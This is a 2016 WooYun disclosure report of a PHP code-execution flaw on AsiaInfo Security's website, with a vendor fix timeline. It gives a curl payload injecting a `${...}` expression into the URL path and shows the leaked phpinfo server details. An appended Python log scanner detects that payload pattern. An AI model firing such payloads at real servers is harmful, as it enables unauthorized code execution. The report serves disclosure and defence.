
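Vulnerability Summary

Bug ID: wooyun-2016-0170826

Title: Arbitrary code execution vulnerability on the AsiaInfo Security official www website

Vendor: AsiaInfo Security (亚信安全)

Author: 猪猪侠

Submitted: 2016-01-18 14:12

Fixed: 2016-02-07 21:42

Published: 2016-02-07 21:42

Vulnerability type: Command execution

Severity: High

Self-assessed Rank: 20

Status: Fixed by the vendor

Source: http://www.wooyun.org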



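Vulnerability Details

Disclosure status:

2016-01-18: Details reported to the vendor; awaiting vendor handling
2016-01-20: Vendor confirmed; details disclosed to the vendor only
2016-01-30: Details disclosed to core white hats and experts in related fields
2016-02-07: Vendor fixed the vulnerability and disclosed it proactively; details disclosed to the public

Brief description:

AsiaInfo Security holds the world's number-one market share in cloud security; it does cloud security, APT governance, antivirus, and also threat intelligence.
Arbitrary code execution vulnerability on the AsiaInfo Security official www website (www.asiainfo-sec.com).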

Detailed description:

#1 Vulnerable URL

curl "http://www.asiainfo-sec.com/index.php/module/action/param1/$%7B@print(phpinfo())%7D"

Proof of vulnerability:

#2 Proof

<table border="0" cellpadding="3" width="600">
<tr><td class="e">System </td><td class="v">Linux localhost.localdomain 3.10.0-229.el7.x86_64 #1 SMP Fri Mar 6 11:36:42 UTC 2015 x86_64 </td></tr>
<tr><td class="e">Build Date </td><td class="v">Jun 23 2015 21:18:22 </td></tr>
<tr><td class="e">Server API </td><td class="v">Apache 2.0 Handler </td></tr>
<tr><td class="e">Virtual Directory Support </td><td class="v">disabled </td></tr>
<tr><td class="e">Configuration File (php.ini) Path </td><td class="v">/etc </td></tr>
<tr><td class="e">Loaded Configuration File </td><td class="v">/etc/php.ini </td></tr>
<tr><td class="e">Scan this dir for additional .ini files </td><td class="v">/etc/php.d </td></tr>
<tr><td class="e">Additional .ini files parsed </td><td class="v">/etc/php.d/curl.ini,
/etc/php.d/fileinfo.ini,
/etc/php.d/json.ini,
/etc/php.d/mbstring.ini,
/etc/php.d/mysql.ini,
/etc/php.d/mysqli.ini,
/etc/php.d/pdo.ini,
/etc/php.d/pdo_mysql.ini,
/etc/php.d/pdo_sqlite.ini,
/etc/php.d/phar.ini,
/etc/php.d/sqlite3.ini,
/etc/php.d/zip.ini
</td></tr>
<tr><td class="e">PHP API </td><td class="v">20100412 </td></tr>
<tr><td class="e">PHP Extension </td><td class="v">20100525 </td></tr>
<tr><td class="e">Zend Extension </td><td class="v">220100525 </td></tr>
<tr><td class="e">Zend Extension Build </td><td class="v">API220100525,NTS </td></tr>
<tr><td class="e">PHP Extension Build </td><td class="v">API20100525,NTS </td></tr>
<tr><td class="e">Debug Build </td><td class="v">no </td></tr>
<tr><td class="e">Thread Safety </td><td class="v">disabled </td></tr>
<tr><td class="e">Zend Signal Handling </td><td class="v">disabled </td></tr>
<tr><td class="e">Zend Memory Manager </td><td class="v">enabled </td></tr>
<tr><td class="e">Zend Multibyte Support </td><td class="v">provided by mbstring </td></tr>
<tr><td class="e">IPv6 Support </td><td class="v">enabled </td></tr>
<tr><td class="e">DTrace Support </td><td class="v">disabled </td></tr>
<tr><td class="e">Registered PHP Streams</td><td class="v">https, ftps, compress.zlib, compress.bzip2, php, file, glob, data, http, ftp, phar, zip</td></tr>
<tr><td class="e">Registered Stream Socket Transports</td><td class="v">tcp, udp, unix, udg, ssl, sslv3, sslv2, tls</td></tr>
<tr><td class="e">Registered Stream Filters</td><td class="v">zlib.*, bzip2.*, convert.iconv.*, string.rot13, string.toupper, string.tolower, string.strip_tags, convert.*, consumed, dec


<tr><td class="e">_SERVER["SERVER_SOFTWARE"]</td><td class="v">Apache/2.4.6 (CentOS) PHP/5.4.16</td></tr>
<tr><td class="e">_SERVER["SERVER_NAME"]</td><td class="v">www.asiainfo-sec.com</td></tr>
<tr><td class="e">_SERVER["SERVER_ADDR"]</td><td class="v">10.28.141.129</td></tr>
<tr><td class="e">_SERVER["SERVER_PORT"]</td><td class="v">80</td></tr>
<tr><td class="e">_SERVER["REMOTE_ADDR"]</td><td class="v">10.28.141.11</td></tr>
<tr><td class="e">_SERVER["DOCUMENT_ROOT"]</td><td class="v">/var/www/html/asiainfo-sec</td></tr>
<tr><td class="e">_SERVER["REQUEST_SCHEME"]</td><td class="v">http</td></tr>
<tr><td class="e">_SERVER["CONTEXT_PREFIX"]</td><td class="v"><i>no value</i></td></tr>
<tr><td class="e">_SERVER["CONTEXT_DOCUMENT_ROOT"]</td><td class="v">/var/www/html/asiainfo-sec</td></tr>
<tr><td class="e">_SERVER["SERVER_ADMIN"]</td><td class="v">root@localhost</td></tr>
<tr><td class="e">_SERVER["SCRIPT_FILENAME"]</td><td class="v">/var/www/html/asiainfo-sec/index.php</td></tr>
<tr><td class="e">_SERVER["REMOTE_PORT"]</td><td class="v">31156</td></tr>
<tr><td class="e">_SERVER["GATEWAY_INTERFACE"]</td><td class="v">CGI/1.1</td></tr>
<tr><td class="e">_SERVER["SERVER_PROTOCOL"]</td><td class="v">HTTP/1.1</td></tr>
<tr><td class="e">_SERVER["REQUEST_METHOD"]</td><td class="v">GET</td></tr>
<tr><td class="e">_SERVER["QUERY_STRING"]</td><td class="v"><i>no value</i></td></tr>
<tr><td class="e">_SERVER["REQUEST_URI"]</td><td class="v">/index.php/module/action/param1/$%7B@print(phpinfo())%7D</td></tr>
<tr><td class="e">_SERVER["SCRIPT_NAME"]</td><td class="v">/index.php</td></tr>
<tr><td class="e">_SERVER["PATH_INFO"]</td><td class="v">/module/action/param1/${@print(phpinfo())}</td></tr>
<tr><td class="e">_SERVER["PATH_TRANSLATED"]</td><td class="v">/var/www/html/asiainfo-sec/module/action/param1/${@print(phpinfo())}</td></tr>
<tr><td class="e">_SERVER["PHP_SELF"]</td><td class="v">/index.php/module/action/param1/${@print(phpinfo())}</td></tr>
<tr><td class="e">_SERVER["REQUEST_TIME_FLOAT"]</td><td class="v">1453096960.528</td></tr>
<tr><td class="e">_SERVER["REQUEST_TIME"]</td><td class="v">1453096960</td></tr>
</table><br />
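An added example, not part of the original report: a log check that flags the request shape visible in the REQUEST_URI and PATH_INFO rows above, a PHP `${...}` expression containing a function call inside the URL path, including percent-encoded and double-encoded forms. The log lines, client addresses and function names are constructed for illustration, and a combined-format access log is assumed.

```python
import re
from urllib.parse import unquote

# "${ ... }" wrapping a function call, the shape seen in PATH_INFO above.
PHP_EXPR = re.compile(r"\$\{[^{}]*\([^{}]*\)[^{}]*\}")
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD|PUT|DELETE|OPTIONS) (\S+) HTTP/[\d.]+"')

# Constructed sample entries; addresses come from documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Jan/2016:14:02:40 +0800] "GET /index.php/module/action'
    '/param1/$%7B@print(phpinfo())%7D HTTP/1.1" 200 71234',
    '192.0.2.11 - - [18/Jan/2016:14:03:01 +0800] "GET /index.php/news/view/id/42'
    ' HTTP/1.1" 200 5120',
    '198.51.100.7 - - [18/Jan/2016:14:03:09 +0800] "GET /index.php/module/action'
    '/param1/%2524%257Bphpinfo()%257D HTTP/1.1" 200 70991',
]


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalized too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_access_log(lines):
    """Return (client_ip, expression) for every ${...} call found in a URL path."""
    hits = []
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            continue  # not a request line we can parse
        path = decode_fully(match.group(1).split("?", 1)[0])
        client_ip = line.split(" ", 1)[0]
        for expr in PHP_EXPR.findall(path):
            hits.append((client_ip, expr))
    return hits


if __name__ == "__main__":
    for ip, expr in scan_access_log(SAMPLE_LOG):
        print(f"{ip} sent a PHP expression in the URL path: {expr}")
```

A hit answered with status 200 and an unusually large body, as the phpinfo output above would be, is worth triaging first.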

Fix:

Update the framework

Copyright notice: when reposting, please credit the source 猪猪侠@乌云 (WooYun)


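Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2016-01-20 14:23

Vendor reply:

Thank you very much for promptly informing us of the potential risk to our system; we will resolve and correct it as soon as possible.

Latest status:

2016-01-20: Fixed

2016-02-07: Fix confirmed and vulnerability made public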